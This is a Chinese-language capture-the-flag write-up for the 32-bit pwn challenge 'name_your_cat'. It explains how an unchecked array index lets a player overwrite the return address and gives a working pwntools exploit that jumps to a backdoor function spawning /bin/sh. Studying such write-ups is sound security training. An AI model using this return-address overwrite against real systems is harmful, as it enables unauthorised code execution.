wustctf2020_name_your_cat

wustctf2020_name_your_cat

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,开了NX和canary

int shell()
{
  return system("/bin/sh");
}

有个后门函数

unsigned int vulnerable()
{
  int v0; // ST20_4
  signed int i; // [esp+Ch] [ebp-3Ch]
  char v3[40]; // [esp+14h] [ebp-34h]
  unsigned int v4; // [esp+3Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  puts("I bought you five famale cats.Name for them?");
  for ( i = 1; i <= 5; ++i )
  {
    v0 = NameWhich((int)v3);
    printf("You get %d cat!!!!!!\nlemonlemonlemonlemonlemonlemonlemon5555555\n", i);
    printf("Her name is:%s\n\n", &v3[8 * v0]);
  }
  return __readgsdword(0x14u) ^ v4;
}

这里有个&v3[8 * v0],如果v0可以控制,我们就相当于任意地址写,v0是下面函数的返回值

int __cdecl NameWhich(int a1)
{
  int v2; // [esp+18h] [ebp-10h]
  unsigned int v3; // [esp+1Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Name for which?\n>");
  __isoc99_scanf("%d", &v2);
  printf("Give your name plz: ");
  __isoc99_scanf("%7s", 8 * v2 + a1);
  return v2;
}

v0也就是这个函数的v2,没有边界处理,可以任意写

思路

利用两个函数,控制v3数组的返回值,改成后门函数,当我们结束函数,就可以跳转了

具体算的话

char v3[40]; // [esp+14h] [ebp-34h]
ebp是0x34,到返回值是0x38=56
&v3[8 * v0]要v3到返回值就是56/8=7
只要v0等于7,然后我们写入后门函数即可
from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26539,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')

sla(b'>',b'7')
sla(b'plz: ',p32(0x80485D4))
for i in range(4):
    sla(b'>',b'1')
    sla(b'plz: ',b'a')

ia()

在这里插入图片描述

你可能感兴趣的:(Buuoj刷题,安全)